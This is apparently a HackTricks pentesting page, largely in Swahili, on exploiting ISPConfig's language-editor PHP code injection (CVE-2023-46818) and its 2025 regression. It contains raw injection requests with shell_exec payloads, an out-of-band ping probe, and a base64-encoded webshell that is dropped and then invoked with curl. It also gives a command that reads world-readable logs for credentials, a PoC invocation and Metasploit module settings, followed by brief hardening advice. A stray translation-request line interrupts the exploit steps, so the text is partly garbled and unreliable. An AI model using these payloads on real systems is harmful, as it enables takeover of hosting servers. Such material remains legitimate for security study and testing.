ISPConfig

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari

ISPConfig ni paneli ya udhibiti ya hosting ya chanzo wazi. Toleo la zamani 3.2.x lilikuwa na kipengele cha mhariri wa faili za lugha ambacho, kinapoamilishwa kwa msimamizi mkuu, kiliruhusu arbitrary PHP code injection kupitia rekodi ya tafsiri iliyofomatiwa vibaya. Hii inaweza kusababisha RCE katika muktadha wa web server na, kulingana na jinsi PHP inavyotekelezwa, privilege escalation.

Njia za kimsingi za default:

  • Web root mara nyingi iko kwenye /var/www/ispconfig inapohudumiwa na php -S au kupitia Apache/nginx.
  • Admin UI inapatikana kwenye vhost ya HTTP(S) (mara nyingine imefungwa kwa localhost pekee; tumia SSH port-forward ikiwa inahitajika).

Kidokezo: Ikiwa paneli imefungwa ndani (kwa mfano 127.0.0.1:8080), elekeza:

ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001

Mhariri wa lugha PHP code injection (CVE-2023-46818)

  • Imeathiriwa: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
  • Masharti ya awali:
  • Ingia kama akaunti ya superadmin iliyojengwa admin (majukumu mengine hayajaathirika kwa mujibu wa muuzaji)
  • Mhariri wa lugha lazima uwe umewezeshwa: admin_allow_langedit=yes katika /usr/local/ispconfig/security/security_settings.ini
  • Athari: Admin aliyethibitishwa anaweza kuingiza PHP yoyote inayoweza kuandikwa kwenye faili la lugha na kutekelezwa na programu, hivyo kufanikisha RCE katika muktadha wa wavuti

Marejeleo: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

Manual exploitation flow

  1. Open/create a language file to obtain CSRF tokens

Tuma POST ya kwanza ili kuanzisha fomu na pata viwanja vya CSRF kutoka kwa jibu la HTML (csrf_id, csrf_key). Mfano wa request path: /admin/language_edit.php.

  1. Inject PHP via records[] and save

Wasilisha POST ya pili ikijumuisha viwanja vya CSRF na rekodi ya tafsiri yenye hatari. Minimal command-execution probes:

POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>

Jaribio la Out-of-band (tazama ICMP):

records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
  1. Andika faili na uweke webshell

Tumia file_put_contents kuunda faili chini ya njia inayoweza kufikiwa na wavuti (kwa mfano, admin/):

records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>

Kisha andika webshell rahisi ukitumia base64 ili kuepuka herufi mbaya katika POST body:

records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>

Ili niweke tafsiri, tafadhali weka hapa yaliyomo ya faili src/network-services-pentesting/pentesting-web/ispconfig.md unayotaka itafsiriwe.

curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'

Ikiwa PHP inatekelezwa kama root (kwa mfano, kupitia php -S 127.0.0.1:8080 iliyoanzishwa na root), hii husababisha root RCE mara moja. Vinginevyo, unapata utekelezaji wa msimbo kama mtumiaji wa seva ya wavuti.

2025 regression (ISPConfig 3.3.0 / 3.3.0p1)

Mdudu wa mhariri wa lugha ulijitokeza tena katika 3.3.0/3.3.0p1 na ulirekebishwa katika 3.3.0p2. Masharti ya awali hayajabadilika (admin_allow_langedit na kuingia kwa admin). Patch ile ile pia ilishughulikia monitor XSS na world-readable rotated logs.

Maelezo:

  • Katika 3.3.0/3.3.0p1, world-readable rotated logs chini ya /usr/local/ispconfig/interface/log/ zinaweza leak nyaraka za uthibitisho ikiwa debug logging ilikuwa imewezeshwa:
find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
  • Hatua za exploit zinafanana na CVE-2023-46818; 3.3.0p2 inaongeza ukaguzi wa ziada kabla ya uhariri wa lugha.

Python PoC

Exploit tayari kwa matumizi hufanya kwa njia ya otomatiki token handling na payload delivery:

Mfano wa utekelezaji:

python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>

Metasploit module (imetolewa Julai 2025)

Rapid7 iliongeza exploit/linux/http/ispconfig_lang_edit_php_code_injection, ambayo inaweza kuwezesha kiotomatiki admin_allow_langedit ikiwa akaunti ya admin iliyotolewa ina haki za system-config.

use exploit/linux/http/ispconfig_lang_edit_php_code_injection
set RHOSTS 10.10.10.50
set RPORT 8080
set USERNAME admin
set PASSWORD <admin_pass>
set TARGETURI /
run

Moduli inaandika base64-encoded payload kupitia records[] na kuiendesha, ikitoa PHP Meterpreter au custom payload.

Kuimarisha usalama

  • Sasisha hadi 3.2.11p1 au baadaye kwa tatizo la awali, na hadi 3.3.0p2 au baadaye kwa regression ya 2025.
  • Zima mhariri wa lugha isipokuwa inahitajika kabisa:
admin_allow_langedit=no
  • Epuka kuendesha paneli kama root; sanidi PHP-FPM au web server ili kupunguza ruhusa
  • Lazimisha uthibitisho thabiti kwa akaunti ya kujengewa admin

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks